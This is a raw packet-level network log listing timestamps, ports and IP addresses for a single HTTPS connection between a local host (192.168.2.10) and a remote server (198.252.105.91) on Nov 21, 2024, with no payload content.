Nov 21, 2024 17:00:16.714502096 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.714524031 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.714540958 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.873188019 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.873213053 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.873328924 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.873343945 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.873383999 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.880228996 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.880258083 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.880337954 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.880345106 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.880393982 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.887053967 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.887075901 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.887188911 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.887195110 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.887237072 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.894855022 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.894879103 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.894920111 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.894927979 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.894954920 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.894969940 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.902590990 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.902607918 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.902677059 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.902686119 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.902728081 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.909815073 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.909835100 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.909899950 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.909908056 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.909948111 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.917859077 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.917881012 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.917946100 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.917954922 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.917989016 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.926675081 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.926693916 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.926785946 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.926794052 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.926832914 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.084394932 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.084415913 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.084494114 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.084505081 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.084549904 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.091499090 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.091521025 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.091593981 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.091602087 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.091643095 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.098241091 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.098263025 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.098351002 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.098359108 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.098402023 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.106101990 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.106122971 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.106245041 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.106252909 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.106307030 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.115056992 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.115080118 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.115180016 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.115189075 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.115242004 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.121057034 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.121074915 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.121135950 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.121144056 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.121191025 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.128817081 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.128834963 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.128922939 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.128936052 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.128977060 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.137516975 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.137543917 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.137631893 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.137643099 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.137696028 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.294857979 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.294882059 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.294959068 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.294990063 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.295032024 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.301974058 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.301991940 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.302046061 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.302057028 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.302098989 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.308706045 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.308722973 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.308765888 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.308774948 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.308803082 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.308819056 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.316539049 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.316560984 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.316615105 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.316623926 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.316684961 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.324302912 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.324325085 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.324373960 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.324383974 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.324426889 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.324440956 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.331615925 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.331635952 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.331690073 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.331698895 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.331758976 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.339355946 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.339373112 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.339421034 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.339428902 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.339464903 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.339477062 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.347757101 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.347775936 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.347868919 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.347876072 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.347888947 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.347923040 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.505481005 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.505507946 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.505610943 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.505628109 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.505667925 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.505676985 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.512603045 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.512623072 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.512686014 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.512695074 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.512734890 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.520313978 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.520334005 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.520390987 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.520399094 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.520428896 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.520446062 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.527129889 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.527156115 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.527215958 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.527226925 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.527249098 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.527296066 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.534914017 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.534943104 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.535008907 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.535017014 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.535056114 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.542267084 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.542293072 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.542368889 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.542376995 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.542417049 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.549937010 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.549962997 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.550015926 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.550024033 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.550062895 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.558887959 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.558932066 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.558990955 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.559005976 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.559043884 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.715960026 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.715989113 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.716121912 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.716140985 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.716195107 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.722719908 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.722737074 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.722815037 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.722822905 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.722865105 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.730611086 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.730629921 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.730694056 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.730704069 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.730751991 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.738292933 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.738310099 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.738367081 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.738373995 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.738415003 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.745110035 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.745135069 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.745193005 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.745201111 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.745239973 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.753379107 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.753398895 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.753519058 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.753526926 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.753575087 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.760332108 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.760353088 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.760407925 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.760416985 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.760443926 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.760462046 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.769951105 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.769970894 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.770056009 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.770064116 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.770107031 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.926522970 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.926546097 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.926604986 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.926620960 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.926645041 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.926670074 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.933445930 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.933464050 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.933522940 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.933532000 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.933573008 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.941226006 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.941242933 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.941315889 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.941327095 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.941368103 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.947983980 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.947999954 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.948052883 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.948061943 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.948110104 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.955868959 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.955885887 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.955981970 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.955990076 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.956033945 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.963262081 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.963280916 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.963382006 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.963390112 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.963434935 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.970995903 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.971013069 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.971080065 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.971087933 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.971128941 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.980555058 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.980573893 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.980655909 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:17.980664015 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:17.980757952 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.136729002 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.136754990 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.136841059 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.136868954 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.136920929 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.144011974 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.144033909 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.144164085 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.144175053 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.144223928 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.151801109 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.151818037 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.151899099 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.151906967 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.151949883 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.158674955 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.158691883 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.158756018 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.158766031 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.158807039 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.166340113 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.166367054 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.166450977 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.166467905 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.166539907 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.173636913 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.173657894 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.173732996 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.173743963 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.173785925 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.181818008 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.181842089 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.181916952 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.181925058 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.181977034 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.190996885 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.191018105 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.191116095 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.191126108 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.191173077 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.347220898 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.347248077 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.347351074 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.347373962 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.347420931 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.354630947 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.354648113 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.354696035 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.354708910 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.354722977 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.354743958 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.362121105 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.362143040 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.362194061 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.362206936 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.362219095 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.362243891 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.370049000 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.370079994 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.370131016 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.370151997 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.370167017 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.370194912 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.376801014 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.376838923 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.376887083 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.376895905 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.376909018 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.376938105 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.384087086 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.384125948 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.384165049 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.384171963 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.384185076 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.384212971 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.391968966 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.392004967 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.392050028 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.392056942 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.392069101 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.392102003 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.401384115 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.401413918 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.401499987 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.401515007 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.401556969 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.558410883 CET	443	49713	198.252.105.91	192.168.2.10
